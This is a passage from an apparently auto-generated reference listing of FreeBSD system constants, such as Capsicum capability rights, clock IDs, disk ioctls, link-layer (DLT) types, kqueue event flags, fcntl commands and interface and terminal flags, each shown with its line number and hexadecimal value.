0x20000000000003f constant CAP_MMAP_RX (line 292) | CAP_MMAP_RX = 0x20000000000003d constant CAP_MMAP_W (line 293) | CAP_MMAP_W = 0x20000000000001e constant CAP_MMAP_WX (line 294) | CAP_MMAP_WX = 0x20000000000003e constant CAP_MMAP_X (line 295) | CAP_MMAP_X = 0x20000000000003c constant CAP_PDGETPID (line 296) | CAP_PDGETPID = 0x400000000000200 constant CAP_PDKILL (line 297) | CAP_PDKILL = 0x400000000000800 constant CAP_PDWAIT (line 298) | CAP_PDWAIT = 0x400000000000400 constant CAP_PEELOFF (line 299) | CAP_PEELOFF = 0x200001000000000 constant CAP_POLL_EVENT (line 300) | CAP_POLL_EVENT = 0x400000000000020 constant CAP_PREAD (line 301) | CAP_PREAD = 0x20000000000000d constant CAP_PWRITE (line 302) | CAP_PWRITE = 0x20000000000000e constant CAP_READ (line 303) | CAP_READ = 0x200000000000001 constant CAP_RECV (line 304) | CAP_RECV = 0x200000000000001 constant CAP_RENAMEAT_SOURCE (line 305) | CAP_RENAMEAT_SOURCE = 0x200000004000400 constant CAP_RENAMEAT_TARGET (line 306) | CAP_RENAMEAT_TARGET = 0x200040000000400 constant CAP_RIGHTS_VERSION (line 307) | CAP_RIGHTS_VERSION = 0x0 constant CAP_RIGHTS_VERSION_00 (line 308) | CAP_RIGHTS_VERSION_00 = 0x0 constant CAP_SEEK (line 309) | CAP_SEEK = 0x20000000000000c constant CAP_SEEK_TELL (line 310) | CAP_SEEK_TELL = 0x200000000000004 constant CAP_SEM_GETVALUE (line 311) | CAP_SEM_GETVALUE = 0x400000000000004 constant CAP_SEM_POST (line 312) | CAP_SEM_POST = 0x400000000000008 constant CAP_SEM_WAIT (line 313) | CAP_SEM_WAIT = 0x400000000000010 constant CAP_SEND (line 314) | CAP_SEND = 0x200000000000002 constant CAP_SETSOCKOPT (line 315) | CAP_SETSOCKOPT = 0x200002000000000 constant CAP_SHUTDOWN (line 316) | CAP_SHUTDOWN = 0x200004000000000 constant CAP_SOCK_CLIENT (line 317) | CAP_SOCK_CLIENT = 0x200007780000003 constant CAP_SOCK_SERVER (line 318) | CAP_SOCK_SERVER = 0x200007f60000003 constant CAP_SYMLINKAT (line 319) | CAP_SYMLINKAT = 0x200000008000400 constant CAP_TTYHOOK (line 320) | CAP_TTYHOOK = 0x400000000000100 constant CAP_UNLINKAT (line 321) | CAP_UNLINKAT = 0x200000010000400 constant CAP_UNUSED0_44 (line 322) | CAP_UNUSED0_44 = 0x200080000000000 constant CAP_UNUSED0_57 (line 323) | CAP_UNUSED0_57 = 0x300000000000000 constant CAP_UNUSED1_22 (line 324) | CAP_UNUSED1_22 = 0x400000000200000 constant CAP_UNUSED1_57 (line 325) | CAP_UNUSED1_57 = 0x500000000000000 constant CAP_WRITE (line 326) | CAP_WRITE = 0x200000000000002 constant CFLUSH (line 327) | CFLUSH = 0xf constant CLOCAL (line 328) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 329) | CLOCK_MONOTONIC = 0x4 constant CLOCK_MONOTONIC_FAST (line 330) | CLOCK_MONOTONIC_FAST = 0xc constant CLOCK_MONOTONIC_PRECISE (line 331) | CLOCK_MONOTONIC_PRECISE = 0xb constant CLOCK_PROCESS_CPUTIME_ID (line 332) | CLOCK_PROCESS_CPUTIME_ID = 0xf constant CLOCK_PROF (line 333) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 334) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_FAST (line 335) | CLOCK_REALTIME_FAST = 0xa constant CLOCK_REALTIME_PRECISE (line 336) | CLOCK_REALTIME_PRECISE = 0x9 constant CLOCK_SECOND (line 337) | CLOCK_SECOND = 0xd constant CLOCK_THREAD_CPUTIME_ID (line 338) | CLOCK_THREAD_CPUTIME_ID = 0xe constant CLOCK_UPTIME (line 339) | CLOCK_UPTIME = 0x5 constant CLOCK_UPTIME_FAST (line 340) | CLOCK_UPTIME_FAST = 0x8 constant CLOCK_UPTIME_PRECISE (line 341) | CLOCK_UPTIME_PRECISE = 0x7 constant CLOCK_VIRTUAL (line 342) | CLOCK_VIRTUAL = 0x1 constant CPUSTATES (line 343) | CPUSTATES = 0x5 constant CP_IDLE (line 344) | CP_IDLE = 0x4 constant CP_INTR (line 345) | CP_INTR = 0x3 constant CP_NICE (line 346) | CP_NICE = 0x1 constant CP_SYS (line 347) | CP_SYS = 0x2 constant CP_USER (line 348) | CP_USER = 0x0 constant CREAD (line 349) | CREAD = 0x800 constant CRTSCTS (line 350) | CRTSCTS = 0x30000 constant CS5 (line 351) | CS5 = 0x0 constant CS6 (line 352) | CS6 = 0x100 constant CS7 (line 353) | CS7 = 0x200 constant CS8 (line 354) | CS8 = 0x300 constant CSIZE (line 355) | CSIZE = 0x300 constant CSTART (line 356) | CSTART = 0x11 constant CSTATUS (line 357) | CSTATUS = 0x14 constant CSTOP (line 358) | CSTOP = 0x13 constant CSTOPB (line 359) | CSTOPB = 0x400 constant CSUSP (line 360) | CSUSP = 0x1a constant CTL_HW (line 361) | CTL_HW = 0x6 constant CTL_KERN (line 362) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 363) | CTL_MAXNAME = 0x18 constant CTL_NET (line 364) | CTL_NET = 0x4 constant DIOCGATTR (line 365) | DIOCGATTR = 0xc144648e constant DIOCGDELETE (line 366) | DIOCGDELETE = 0x80106488 constant DIOCGFLUSH (line 367) | DIOCGFLUSH = 0x20006487 constant DIOCGFRONTSTUFF (line 368) | DIOCGFRONTSTUFF = 0x40086486 constant DIOCGFWHEADS (line 369) | DIOCGFWHEADS = 0x40046483 constant DIOCGFWSECTORS (line 370) | DIOCGFWSECTORS = 0x40046482 constant DIOCGIDENT (line 371) | DIOCGIDENT = 0x41006489 constant DIOCGMEDIASIZE (line 372) | DIOCGMEDIASIZE = 0x40086481 constant DIOCGPHYSPATH (line 373) | DIOCGPHYSPATH = 0x4400648d constant DIOCGPROVIDERNAME (line 374) | DIOCGPROVIDERNAME = 0x4400648a constant DIOCGSECTORSIZE (line 375) | DIOCGSECTORSIZE = 0x40046480 constant DIOCGSTRIPEOFFSET (line 376) | DIOCGSTRIPEOFFSET = 0x4008648c constant DIOCGSTRIPESIZE (line 377) | DIOCGSTRIPESIZE = 0x4008648b constant DIOCSKERNELDUMP (line 378) | DIOCSKERNELDUMP = 0x804c6490 constant DIOCSKERNELDUMP_FREEBSD11 (line 379) | DIOCSKERNELDUMP_FREEBSD11 = 0x80046485 constant DIOCZONECMD (line 380) | DIOCZONECMD = 0xc06c648f constant DLT_A429 (line 381) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 382) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 383) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 384) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 385) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 386) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 387) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 388) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 389) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 390) | DLT_AURORA = 0x7e constant DLT_AX25 (line 391) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 392) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 393) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_BREDR_BB (line 394) | DLT_BLUETOOTH_BREDR_BB = 0xff constant DLT_BLUETOOTH_HCI_H4 (line 395) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 396) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_BLUETOOTH_LE_LL (line 397) | DLT_BLUETOOTH_LE_LL = 0xfb constant DLT_BLUETOOTH_LE_LL_WITH_PHDR (line 398) | DLT_BLUETOOTH_LE_LL_WITH_PHDR = 0x100 constant DLT_BLUETOOTH_LINUX_MONITOR (line 399) | DLT_BLUETOOTH_LINUX_MONITOR = 0xfe constant DLT_CAN20B (line 400) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 401) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 402) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 403) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 404) | DLT_CISCO_IOS = 0x76 constant DLT_CLASS_NETBSD_RAWAF (line 405) | DLT_CLASS_NETBSD_RAWAF = 0x2240000 constant DLT_C_HDLC (line 406) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 407) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 408) | DLT_DBUS = 0xe7 constant DLT_DECT (line 409) | DLT_DECT = 0xdd constant DLT_DISPLAYPORT_AUX (line 410) | DLT_DISPLAYPORT_AUX = 0x113 constant DLT_DOCSIS (line 411) | DLT_DOCSIS = 0x8f constant DLT_DOCSIS31_XRA31 (line 412) | DLT_DOCSIS31_XRA31 = 0x111 constant DLT_DVB_CI (line 413) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 414) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 415) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 416) | DLT_EN3MB = 0x2 constant DLT_ENC (line 417) | DLT_ENC = 0x6d constant DLT_EPON (line 418) | DLT_EPON = 0x103 constant DLT_ERF (line 419) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 420) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 421) | DLT_ERF_POS = 0xb0 constant DLT_ETHERNET_MPACKET (line 422) | DLT_ETHERNET_MPACKET = 0x112 constant DLT_FC_2 (line 423) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 424) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 425) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 426) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 427) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 428) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 429) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 430) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 431) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 432) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 433) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 434) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 435) | DLT_GSMTAP_UM = 0xd9 constant DLT_IBM_SN (line 436) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 437) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 438) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 439) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 440) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 441) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 442) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 443) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 444) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 445) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 446) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 447) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_INFINIBAND (line 448) | DLT_INFINIBAND = 0xf7 constant DLT_IPFILTER (line 449) | DLT_IPFILTER = 0x74 constant DLT_IPMB_KONTRON (line 450) | DLT_IPMB_KONTRON = 0xc7 constant DLT_IPMB_LINUX (line 451) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPMI_HPM_2 (line 452) | DLT_IPMI_HPM_2 = 0x104 constant DLT_IPNET (line 453) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 454) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 455) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 456) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 457) | DLT_IP_OVER_FC = 0x7a constant DLT_ISO_14443 (line 458) | DLT_ISO_14443 = 0x108 constant DLT_JUNIPER_ATM1 (line 459) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 460) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 461) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 462) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 463) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 464) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 465) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 466) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 467) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 468) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 469) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 470) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 471) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 472) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 473) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 474) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 475) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 476) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 477) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 478) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 479) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 480) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 481) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 482) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 483) | DLT_LAPD = 0xcb constant DLT_LIN (line 484) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 485) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 486) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 487) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 488) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 489) | DLT_LINUX_SLL = 0x71 constant DLT_LINUX_SLL2 (line 490) | DLT_LINUX_SLL2 = 0x114 constant DLT_LOOP (line 491) | DLT_LOOP = 0x6c constant DLT_LORATAP (line 492) | DLT_LORATAP = 0x10e constant DLT_LTALK (line 493) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 494) | DLT_MATCHING_MAX = 0x114 constant DLT_MATCHING_MIN (line 495) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 496) | DLT_MFR = 0xb6 constant DLT_MOST (line 497) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 498) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 499) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 500) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 501) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 502) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 503) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 504) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 505) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NETLINK (line 506) | DLT_NETLINK = 0xfd constant DLT_NFC_LLCP (line 507) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 508) | DLT_NFLOG = 0xef constant DLT_NG40 (line 509) | DLT_NG40 = 0xf4 constant DLT_NORDIC_BLE (line 510) | DLT_NORDIC_BLE = 0x110 constant DLT_NULL (line 511) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 512) | DLT_OPENFLOW = 0x10b constant DLT_PCI_EXP (line 513) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 514) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 515) | DLT_PFSYNC = 0x79 constant DLT_PKTAP (line 516) | DLT_PKTAP = 0x102 constant DLT_PPI (line 517) | DLT_PPI = 0xc0 constant DLT_PPP (line 518) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 519) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 520) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 521) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 522) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 523) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 524) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 525) | DLT_PRISM_HEADER = 0x77 constant DLT_PROFIBUS_DL (line 526) | DLT_PROFIBUS_DL = 0x101 constant DLT_PRONET (line 527) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 528) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 529) | DLT_RAW = 0xc constant DLT_RDS (line 530) | DLT_RDS = 0x109 constant DLT_REDBACK_SMARTEDGE (line 531) | DLT_REDBACK_SMARTEDGE = 0x20 constant DLT_RIO (line 532) | DLT_RIO = 0x7c constant DLT_RTAC_SERIAL (line 533) | DLT_RTAC_SERIAL = 0xfa constant DLT_SCCP (line 534) | DLT_SCCP = 0x8e constant DLT_SCTP (line 535) | DLT_SCTP = 0xf8 constant DLT_SDLC (line 536) | DLT_SDLC = 0x10c constant DLT_SITA (line 537) | DLT_SITA = 0xc4 constant DLT_SLIP (line 538) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 539) | DLT_SLIP_BSDOS = 0xd constant DLT_STANAG_5066_D_PDU (line 540) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 541) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 542) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TI_LLN_SNIFFER (line 543) | DLT_TI_LLN_SNIFFER = 0x10d constant DLT_TZSP (line 544) | DLT_TZSP = 0x80 constant DLT_USB (line 545) | DLT_USB = 0xba constant DLT_USBPCAP (line 546) | DLT_USBPCAP = 0xf9 constant DLT_USB_DARWIN (line 547) | DLT_USB_DARWIN = 0x10a constant DLT_USB_FREEBSD (line 548) | DLT_USB_FREEBSD = 0xba constant DLT_USB_LINUX (line 549) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 550) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 551) | DLT_USER0 = 0x93 constant DLT_USER1 (line 552) | DLT_USER1 = 0x94 constant DLT_USER10 (line 553) | DLT_USER10 = 0x9d constant DLT_USER11 (line 554) | DLT_USER11 = 0x9e constant DLT_USER12 (line 555) | DLT_USER12 = 0x9f constant DLT_USER13 (line 556) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 557) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 558) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 559) | DLT_USER2 = 0x95 constant DLT_USER3 (line 560) | DLT_USER3 = 0x96 constant DLT_USER4 (line 561) | DLT_USER4 = 0x97 constant DLT_USER5 (line 562) | DLT_USER5 = 0x98 constant DLT_USER6 (line 563) | DLT_USER6 = 0x99 constant DLT_USER7 (line 564) | DLT_USER7 = 0x9a constant DLT_USER8 (line 565) | DLT_USER8 = 0x9b constant DLT_USER9 (line 566) | DLT_USER9 = 0x9c constant DLT_VSOCK (line 567) | DLT_VSOCK = 0x10f constant DLT_WATTSTOPPER_DLM (line 568) | DLT_WATTSTOPPER_DLM = 0x107 constant DLT_WIHART (line 569) | DLT_WIHART = 0xdf constant DLT_WIRESHARK_UPPER_PDU (line 570) | DLT_WIRESHARK_UPPER_PDU = 0xfc constant DLT_X2E_SERIAL (line 571) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 572) | DLT_X2E_XORAYA = 0xd6 constant DLT_ZWAVE_R1_R2 (line 573) | DLT_ZWAVE_R1_R2 = 0x105 constant DLT_ZWAVE_R3 (line 574) | DLT_ZWAVE_R3 = 0x106 constant DT_BLK (line 575) | DT_BLK = 0x6 constant DT_CHR (line 576) | DT_CHR = 0x2 constant DT_DIR (line 577) | DT_DIR = 0x4 constant DT_FIFO (line 578) | DT_FIFO = 0x1 constant DT_LNK (line 579) | DT_LNK = 0xa constant DT_REG (line 580) | DT_REG = 0x8 constant DT_SOCK (line 581) | DT_SOCK = 0xc constant DT_UNKNOWN (line 582) | DT_UNKNOWN = 0x0 constant DT_WHT (line 583) | DT_WHT = 0xe constant ECHO (line 584) | ECHO = 0x8 constant ECHOCTL (line 585) | ECHOCTL = 0x40 constant ECHOE (line 586) | ECHOE = 0x2 constant ECHOK (line 587) | ECHOK = 0x4 constant ECHOKE (line 588) | ECHOKE = 0x1 constant ECHONL (line 589) | ECHONL = 0x10 constant ECHOPRT (line 590) | ECHOPRT = 0x20 constant EVFILT_AIO (line 591) | EVFILT_AIO = -0x3 constant EVFILT_EMPTY (line 592) | EVFILT_EMPTY = -0xd constant EVFILT_FS (line 593) | EVFILT_FS = -0x9 constant EVFILT_LIO (line 594) | EVFILT_LIO = -0xa constant EVFILT_PROC (line 595) | EVFILT_PROC = -0x5 constant EVFILT_PROCDESC (line 596) | EVFILT_PROCDESC = -0x8 constant EVFILT_READ (line 597) | EVFILT_READ = -0x1 constant EVFILT_SENDFILE (line 598) | EVFILT_SENDFILE = -0xc constant EVFILT_SIGNAL (line 599) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 600) | EVFILT_SYSCOUNT = 0xd constant EVFILT_TIMER (line 601) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 602) | EVFILT_USER = -0xb constant EVFILT_VNODE (line 603) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 604) | EVFILT_WRITE = -0x2 constant EVNAMEMAP_NAME_SIZE (line 605) | EVNAMEMAP_NAME_SIZE = 0x40 constant EV_ADD (line 606) | EV_ADD = 0x1 constant EV_CLEAR (line 607) | EV_CLEAR = 0x20 constant EV_DELETE (line 608) | EV_DELETE = 0x2 constant EV_DISABLE (line 609) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 610) | EV_DISPATCH = 0x80 constant EV_DROP (line 611) | EV_DROP = 0x1000 constant EV_ENABLE (line 612) | EV_ENABLE = 0x4 constant EV_EOF (line 613) | EV_EOF = 0x8000 constant EV_ERROR (line 614) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 615) | EV_FLAG1 = 0x2000 constant EV_FLAG2 (line 616) | EV_FLAG2 = 0x4000 constant EV_FORCEONESHOT (line 617) | EV_FORCEONESHOT = 0x100 constant EV_ONESHOT (line 618) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 619) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 620) | EV_SYSFLAGS = 0xf000 constant EXTA (line 621) | EXTA = 0x4b00 constant EXTATTR_MAXNAMELEN (line 622) | EXTATTR_MAXNAMELEN = 0xff constant EXTATTR_NAMESPACE_EMPTY (line 623) | EXTATTR_NAMESPACE_EMPTY = 0x0 constant EXTATTR_NAMESPACE_SYSTEM (line 624) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 625) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 626) | EXTB = 0x9600 constant EXTPROC (line 627) | EXTPROC = 0x800 constant FD_CLOEXEC (line 628) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 629) | FD_SETSIZE = 0x400 constant FLUSHO (line 630) | FLUSHO = 0x800000 constant F_CANCEL (line 631) | F_CANCEL = 0x5 constant F_DUP2FD (line 632) | F_DUP2FD = 0xa constant F_DUP2FD_CLOEXEC (line 633) | F_DUP2FD_CLOEXEC = 0x12 constant F_DUPFD (line 634) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 635) | F_DUPFD_CLOEXEC = 0x11 constant F_GETFD (line 636) | F_GETFD = 0x1 constant F_GETFL (line 637) | F_GETFL = 0x3 constant F_GETLK (line 638) | F_GETLK = 0xb constant F_GETOWN (line 639) | F_GETOWN = 0x5 constant F_OGETLK (line 640) | F_OGETLK = 0x7 constant F_OK (line 641) | F_OK = 0x0 constant F_OSETLK (line 642) | F_OSETLK = 0x8 constant F_OSETLKW (line 643) | F_OSETLKW = 0x9 constant F_RDAHEAD (line 644) | F_RDAHEAD = 0x10 constant F_RDLCK (line 645) | F_RDLCK = 0x1 constant F_READAHEAD (line 646) | F_READAHEAD = 0xf constant F_SETFD (line 647) | F_SETFD = 0x2 constant F_SETFL (line 648) | F_SETFL = 0x4 constant F_SETLK (line 649) | F_SETLK = 0xc constant F_SETLKW (line 650) | F_SETLKW = 0xd constant F_SETLK_REMOTE (line 651) | F_SETLK_REMOTE = 0xe constant F_SETOWN (line 652) | F_SETOWN = 0x6 constant F_UNLCK (line 653) | F_UNLCK = 0x2 constant F_UNLCKSYS (line 654) | F_UNLCKSYS = 0x4 constant F_WRLCK (line 655) | F_WRLCK = 0x3 constant HUPCL (line 656) | HUPCL = 0x4000 constant HW_MACHINE (line 657) | HW_MACHINE = 0x1 constant ICANON (line 658) | ICANON = 0x100 constant ICMP6_FILTER (line 659) | ICMP6_FILTER = 0x12 constant ICRNL (line 660) | ICRNL = 0x100 constant IEXTEN (line 661) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 662) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 663) | IFAN_DEPARTURE = 0x1 constant IFCAP_WOL_MAGIC (line 664) | IFCAP_WOL_MAGIC = 0x2000 constant IFF_ALLMULTI (line 665) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 666) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 667) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 668) | IFF_CANTCHANGE = 0x218f52 constant IFF_CANTCONFIG (line 669) | IFF_CANTCONFIG = 0x10000 constant IFF_DEBUG (line 670) | IFF_DEBUG = 0x4 constant IFF_DRV_OACTIVE (line 671) | IFF_DRV_OACTIVE = 0x400 constant IFF_DRV_RUNNING (line 672) | IFF_DRV_RUNNING = 0x40 constant IFF_DYING (line 673) | IFF_DYING = 0x200000 constant IFF_LINK0 (line 674) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 675) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 676) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 677) | IFF_LOOPBACK = 0x8 constant IFF_MONITOR (line 678) | IFF_MONITOR = 0x40000 constant IFF_MULTICAST (line 679) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 680) | IFF_NOARP = 0x80 constant IFF_NOGROUP (line 681) | IFF_NOGROUP = 0x800000 constant IFF_OACTIVE (line 682) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 683) | IFF_POINTOPOINT = 0x10 constant IFF_PPROMISC (line 684) | IFF_PPROMISC = 0x20000 constant IFF_PROMISC (line 685) | IFF_PROMISC = 0x100 constant IFF_RENAMING (line 686) | IFF_RENAMING = 0x400000 constant IFF_RUNNING (line 687) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 688) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 689) | IFF_STATICARP = 0x80000 constant IFF_UP (line 690) | IFF_UP = 0x1 constant IFNAMSIZ (line 691) | IFNAMSIZ = 0x10 constant IFT_BRIDGE (line 692) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 693) | IFT_CARP = 0xf8 constant IFT_IEEE1394 (line 694) | IFT_IEEE1394 = 0x90 constant IFT_INFINIBAND (line 695) | IFT_INFINIBAND = 0xc7 constant IFT_L2VLAN (line 696) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 697) | IFT_L3IPVLAN = 0x88 constant IFT_PPP (line 698) | IFT_PPP = 0x17 constant IFT_PROPVIRTUAL (line 699) | IFT_PROPVIRTUAL = 0x35 constant IGNBRK (line 700) | IGNBRK = 0x1 constant IGNCR (line 701) | IGNCR = 0x80 constant IGNPAR (line 702) | IGNPAR = 0x4 constant IMAXBEL (line 703) | IMAXBEL = 0x2000 constant INLCR (line 704) | INLCR = 0x40 constant INPCK (line 705) | 